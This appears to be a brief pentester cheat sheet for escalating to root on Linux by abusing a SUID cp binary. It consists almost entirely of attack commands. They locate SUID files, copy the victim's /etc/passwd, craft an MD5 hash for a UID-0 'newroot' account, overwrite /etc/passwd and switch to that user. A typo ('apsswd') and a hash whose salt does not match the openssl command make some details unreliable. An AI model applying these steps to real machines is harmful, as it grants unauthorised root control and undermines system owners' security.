# CP SUID

## CP SUID

* check SUID find / -perm -u=s -type f 2>/dev/null
* If **cp** is there , go ahead
* On victim, cat /etc/apsswd ,
* on attacker, nano passwd , and paste data from victim
* create salt value of password **pass123** for **newroot user openssl passwd -1 -salt newroot pass123**\
  value = **$1$ignite$3eTbJm98O9Hz.k1NTdNxe1**
* add a new line in **passwd** file newroot:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash
* Transfer file to victim
* cp passwd /etc/passwd
* su newroot
* Reference

  <https://www.hackingarticles.in/linux-for-pentester-cp-privilege-escalation/>